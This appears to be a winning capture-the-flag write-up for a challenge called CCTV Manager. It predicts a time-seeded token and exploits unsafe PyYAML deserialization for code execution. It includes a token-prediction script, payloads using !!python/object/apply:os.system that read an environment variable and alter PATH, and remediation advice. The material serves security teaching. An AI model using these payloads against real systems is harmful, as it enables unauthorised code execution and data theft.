The Dojo challenge CCTV Manager tasked participants with predicting a pseudo-random token to gain access and then, once authorized, exploiting an unsafe YAML deserialization vulnerability to achieve remote code execution (RCE) and capture the flag.
The winners
Congrats to mayaar, stealthcopter and Pr1nc3ss for the best write-ups 🥳
The swag is on its way! 🎁
Read on to find out how one of the winners managed to solve the challenge.
TALKIE PWNII #8: VIDEO CHALLENGE WRITE-UP
OVERALL BEST WRITE-UP
We would like to thank everyone who participated and reported their solution for this challenge to the Dojo program. There were many great reports for this challenge and you can find the best write-up below:
CCTV Manager challenge Write-up by Pr1nc3ss
Description
The Python application allows the user to upload custom firmware in YAML text format to update a CCTV camera. The request is only valid if a token is provided alongside the firmware.
The upload mechanism has two vulnerabilities that will be exposed and explained in this report; chaining the vulnerabilities allows us to bypass the security feature in place and execute arbitrary code on the server side.
The most prominent vulnerability is an OS command injection. Such an attack can leak sensitive data or lead to remote code execution, and constitutes a real threat to any system.
Code analysis
The setup code loads a variable into the process environment as FLAG; for the sake of the demonstration, our goal is to retrieve this value.
import os
os.chdir('tmp')
os.mkdir('templates')
os.environ["FLAG"] = flag
The Python code contains a main() function that handles the whole logic. In pseudocode, it follows these steps:
- Generates a tokenRoot
- Loads the user firmware input as yamlConfig and the user-provided authorization token as tokenGuest
- Checks whether the user is authorized by comparing tokenGuest to tokenRoot; if not, the user gets an error
- Parses the user-provided yamlConfig variable and populates the firmware data property
- Executes the firmware update() function
All these steps can be divided into two parts :
Authorization
Execution
For readability, code that is out of scope for the demonstration is replaced by [...].
Authorization
The code logic is straightforward.
def main():
    tokenRoot = genToken(int(time.time()) // 1)  # tokenRoot is generated
    [...]
    tokenGuest = unquote("")  # tokenGuest is populated with user provided token
    access = bool(tokenGuest == tokenRoot)  # comparison is made
    [...]
    if access:  # condition check
        [...]
    print( template.render(access=access) )
The token generation function is as follows:
def genToken(seed:str) -> str:
    random.seed(seed)
    return ''.join(random.choices('abcdef0123456789', k=16))

[...]
genToken(int(time.time()) // 1)  # call site in main()
Read alongside the function call, it is clear that the seed is the current time as an integer. time.time() returns a float, and casting it to an integer drops the fractional part. The floor division by 1 is redundant, as it does not change the value.
This means that tokens are predictable: since the seed can be known, we can generate the token for any second since the Epoch, past or future.
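To make the predictability concrete, here is a minimal sketch that reuses the generation logic shown above. The name gen_token is ours (a copy of the application's genToken); nothing else is assumed. It shows that the same integer seed always yields the same token, and that the token for the next second can be computed ahead of time.

```python
import random
import time

def gen_token(seed: int) -> str:
    # Same logic as the application's genToken(): the seed fully determines the output.
    random.seed(seed)
    return ''.join(random.choices('abcdef0123456789', k=16))

now = time.time()       # float with fractions of a second
seed = int(now) // 1    # fractions are dropped; "// 1" changes nothing
assert seed == int(now)

# Two independent calls with the same seed yield the same token.
first = gen_token(seed)
second = gen_token(seed)
print(first == second)  # True

# The token for the next second can already be computed.
print(gen_token(seed + 1))
```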
Execution
As with the authorization, the code logic is pretty straightforward.
def main():
    [...]
    yamlConfig = unquote("")  # raw user input
    [...]
    firmware = None  # function variable
    [...]
    data = yaml.load(yamlConfig, Loader=yaml.Loader)  # yaml parsing
    firmware = Firmware(**data["firmware"])  # firmware property population
    firmware.update()
    print( template.render(access=access) )
The focus has to be on the yaml.load() call: as we can see, it uses the default yaml.Loader without any configuration change.
Without diving too deep, the default yaml.Loader is instantiated with the default constructor:
# Constructor is same as UnsafeConstructor. Need to leave this in place in case
# people have extended it directly.
class Constructor(UnsafeConstructor):
    pass

class UnsafeConstructor(FullConstructor):

    def find_python_module(self, name, mark):
        return super(UnsafeConstructor, self).find_python_module(name, mark, unsafe=True)

    def find_python_name(self, name, mark):
        return super(UnsafeConstructor, self).find_python_name(name, mark, unsafe=True)

    def make_python_instance(self, suffix, node, args=None, kwds=None, newobj=False):
        return super(UnsafeConstructor, self).make_python_instance(
            suffix, node, args, kwds, newobj, unsafe=True)

    def set_python_instance_state(self, instance, state):
        return super(UnsafeConstructor, self).set_python_instance_state(
            instance, state, unsafe=True)
In the above snippet, the super([...], unsafe=True) calls inside UnsafeConstructor are of critical importance. Set this way, they explicitly permit the resolution of Python modules, names and even instances.
As a direct consequence, using yaml.load(..., Loader=yaml.Loader) enables arbitrary code execution, because the yaml.Loader constructor inherits from UnsafeConstructor. This allows unsafe object deserialization via YAML tags such as !!python/object/apply.
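The difference between the two loaders can be illustrated with a harmless payload. The sketch below assumes PyYAML is installed (the library the application already uses) and swaps os.system for builtins.len, so nothing dangerous is executed; the payload string is our own illustration, not one taken from the challenge.

```python
import yaml  # PyYAML, the same third-party library the application uses

# Harmless stand-in for a malicious payload: calls builtins.len on a list
# instead of os.system on a command string.
payload = '!!python/object/apply:builtins.len [[1, 2, 3]]'

# yaml.Loader resolves the tag and calls the function while parsing.
unsafe_result = yaml.load(payload, Loader=yaml.Loader)
print(unsafe_result)

# yaml.safe_load only knows standard YAML types and rejects the tag.
try:
    yaml.safe_load(payload)
    rejected = False
except yaml.YAMLError as exc:
    rejected = True
    print(type(exc).__name__)
```

The function call happens inside yaml.load() itself, which is why no further application logic is needed to trigger a payload.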
Exploitation
The exploitation was done in two steps. Following the same logic as the Code analysis, we will see how the authorization can be abused to gain access to the firmware part. Then we will see how the environment variable can be extracted thanks to the loader configuration.
Authorization
The tokenRoot generation is time-based. This means that if we manage to generate a token in advance, we can use it. As a reminder, the float returned by the time function is converted into an integer: int(time.time()).
This means that instead of a full value such as 1752785477.7086287, which contains fractions of a second, the code uses 1752785477, a whole second. Since code takes time to run, working with whole seconds is understandable: processing the user input and comparing tokenGuest with tokenRoot cannot reliably be done within the same fraction of a second.
However, this gives us the ability to generate an upcoming token. To do so, we used the same function the application uses to generate the tokenRoot, with a delay added to the seed. We therefore generate the upcoming token and submit it at the right moment. To avoid guessing how much time has elapsed, a countdown tells us when to press the submit button.
The delay is set to 7 seconds so we have enough time to copy/paste the upcoming token.
Token generation Code:
import random
import time

delay = 7  # Adjustable delay, in seconds

def genToken(seed:str) -> str:
    random.seed(seed)
    return ''.join(random.choices('abcdef0123456789', k=16))

def main():
    # Token the server will generate `delay` seconds from now
    tokenRoot = genToken(int(time.time()) + delay)
    print(tokenRoot)
    # Countdown while the token is pasted into the form
    for i in range(delay - 1):
        print(i+1)
        time.sleep(1)
    print("SUBMIT NOW !!!")

if __name__ == "__main__":
    main()
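A possible variation, assuming the submission can be scripted or repeated, is to compute the tokens for a small window of seconds around the current time, which tolerates a slight clock difference between the attacker and the server. The helper candidate_tokens and its parameters are hypothetical names introduced for this sketch; it was not part of the original exploitation.

```python
import random
import time

def gen_token(seed: int) -> str:
    # Mirrors the application's genToken()
    random.seed(seed)
    return ''.join(random.choices('abcdef0123456789', k=16))

def candidate_tokens(now: int, before: int = 2, after: int = 2) -> dict:
    # Hypothetical helper: maps each second in [now - before, now + after]
    # to the token the server would generate during that second.
    return {ts: gen_token(ts) for ts in range(now - before, now + after + 1)}

now = int(time.time())
for ts, token in candidate_tokens(now).items():
    # Offset in seconds relative to the local clock, then the token
    print(ts - now, token)
```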
Exploitation
For the exploitation, as seen during our analysis, the code appears to be prone to unsafe object deserialization.
A quick reminder on the Python code itself. By analyzing it, we know that:
- raw data is read and deserialized from the YAML input by yaml.load()
- the firmware object is populated by Firmware(**data["firmware"])
- firmware.update() does nothing, so the payload has to be executed before it is called
class Firmware():
    def __init__(self, version:str):
        self.version = version

    def update(self):
        pass

data = yaml.load(yamlConfig, Loader=yaml.Loader)
firmware = Firmware(**data["firmware"])
So our payload has to be well-formed YAML in key: value form, and must directly reference the firmware key.
The first payload is a non-invasive command, id. Here is the PoC code:
firmware: !!python/object/apply:os.system ["id"]
As the user id is displayed, this confirms that the code is prone to unsafe object deserialization and, furthermore, to OS command injection.
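A note on timing: the command runs while yaml.load() is still parsing, before Firmware is ever constructed. The sketch below assumes that os.system returned exit status 0, so the firmware key holds an integer rather than a mapping. The Firmware(**...) call then fails, which does not matter to the attacker because the command has already run. How the application handles that error is not shown in the excerpts above.

```python
class Firmware():
    def __init__(self, version: str):
        self.version = version

    def update(self):
        pass

# Assumed result of parsing the PoC: os.system("id") returned exit status 0,
# so the "firmware" key holds an int instead of a mapping.
data = {"firmware": 0}

try:
    Firmware(**data["firmware"])
    constructed = True
except TypeError as exc:
    # ** unpacking requires a mapping, so construction fails here
    constructed = False
    print(exc)
```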
The objective, to prove the vulnerability, was to get the content of the environment variable that had been set as follows:
os.environ["FLAG"] = flag
An OS command was used to print the variable. Here is the PoC code:
firmware: !!python/object/apply:os.system ["echo $FLAG"]
Yet, this only proves that we can read data. A final test was done to check how far the vulnerability goes. To do so, the PATH variable was modified, using this PoC code as an example:
firmware: !!python/object/apply:os.system ["export PATH=$PATH:/opt/pr1nc3ss; echo $PATH;"]
As we can see, the PATH has been modified as expected, at least within the shell spawned by os.system.
Risk
Two vulnerabilities have been identified; furthermore, they can be chained, leading to a complete system compromise with minimal effort. Here are the risks, in order of criticality.
OS Command Injection via YAML Deserialization
This vulnerability allows server-side code execution, as proven previously. An attacker can execute arbitrary commands on the host system and:
- read sensitive data (files, environment variables)
- modify server behavior (altering PATH)
- deploy malware such as a reverse shell (to be confirmed)
This has to be considered critical, especially as it is trivial to exploit with untrusted user input.
Predictable authentication token
This vulnerability allows authorization bypass, in this case unauthenticated access to a restricted functionality (i.e. firmware upload). An attacker can bypass access control by creating tokens based on time.
This has to be considered high severity, as it is easily automated, as seen with the provided code, and only a few seconds of prediction offset are needed.
Remediation
Secure token generation
- Avoid predictable seeds, such as time-based values like int(time.time()), for auth token generation
- As the functionality allows firmware upload, a more secure auth model would be to switch to JWEs (JSON Web Encryption) or signed JWTs (if confidentiality is not mandatory):
  - JWTs/JWEs are not predictable if signed correctly
  - Signing them properly makes them tamper-proof
  - JWEs are confidential (claims cannot be read)
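As a simpler complement to the JWT/JWE suggestion (and not a replacement for it), the first point can be sketched with Python's standard library. This assumes the server is able to store the token and hand it to the legitimate user out of band; the function names new_token and is_authorized are hypothetical.

```python
import hmac
import secrets

def new_token() -> str:
    # 16 hex characters (8 random bytes) from the OS CSPRNG, not from a seeded PRNG
    return secrets.token_hex(8)

def is_authorized(token_guest: str, token_root: str) -> bool:
    # Constant-time comparison, to avoid leaking information through timing
    return hmac.compare_digest(token_guest.encode(), token_root.encode())

token_root = new_token()
print(is_authorized(token_root, token_root))  # True
print(is_authorized("0" * 17, token_root))    # False
```

Unlike random.seed(int(time.time())), secrets draws from the operating system's randomness source, so knowing the generation time does not help in reproducing the token.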
Restrict shell access
- The web user should not be able to execute system-wide commands
- User-controlled input should not be passed into os.system, subprocess or similar shell execution functions
- If needed, use controlled subprocess execution with shell expansion disabled
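The last point can be sketched as follows. This is an illustration only: the child process is the Python interpreter itself, echoing its argument, and run_echo is a hypothetical name. The point is that with an argument list and no shell, metacharacters such as ; and $ are passed through as plain text.

```python
import subprocess
import sys

def run_echo(user_value: str) -> str:
    # Arguments are passed as a list and shell=False (the default), so the
    # value reaches the child process verbatim and is never parsed by a shell.
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1])", user_value],
        capture_output=True, text=True, check=True, timeout=10,
    )
    return result.stdout.strip()

print(run_echo("1.0; echo $FLAG"))  # 1.0; echo $FLAG
```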
User input validation
- Sanitize user input
- Add input validation via YAML schema validation (such as Cerberus)
- Harden YAML deserialization
  - Do not use yaml.load() with yaml.Loader or yaml.UnsafeLoader on untrusted input
  - Use an alternative such as safe_load(), which restricts input to standard YAML types (lists, dicts, strings, etc.), blocking Python-specific object tags like !!python/object/apply
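To illustrate the validation step, here is a hand-written check standing in for a schema library such as Cerberus. It is meant to be applied to the output of yaml.safe_load(). The accepted shape (a single firmware key containing a string version) is inferred from the Firmware class shown earlier, and validate_firmware_config is a hypothetical name.

```python
def validate_firmware_config(data) -> dict:
    # Accept only {"firmware": {"version": "<string>"}} and nothing else.
    if not isinstance(data, dict) or set(data) != {"firmware"}:
        raise ValueError("expected a single top-level 'firmware' key")
    firmware = data["firmware"]
    if not isinstance(firmware, dict) or set(firmware) != {"version"}:
        raise ValueError("'firmware' must contain exactly one key: 'version'")
    if not isinstance(firmware["version"], str):
        raise ValueError("'version' must be a string")
    return firmware

print(validate_firmware_config({"firmware": {"version": "1.0.2"}}))  # {'version': '1.0.2'}
```

Only the validated dictionary would then be passed to Firmware(**...), so unexpected keys or types are rejected before they reach application logic.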
Logging and monitoring
- Log failed or malformed YAML uploads
- Monitor for unexpected behaviors (changes to PATH, access to out-of-scope files, etc.)
- Isolate the firmware upload/update process from the rest of the server if possible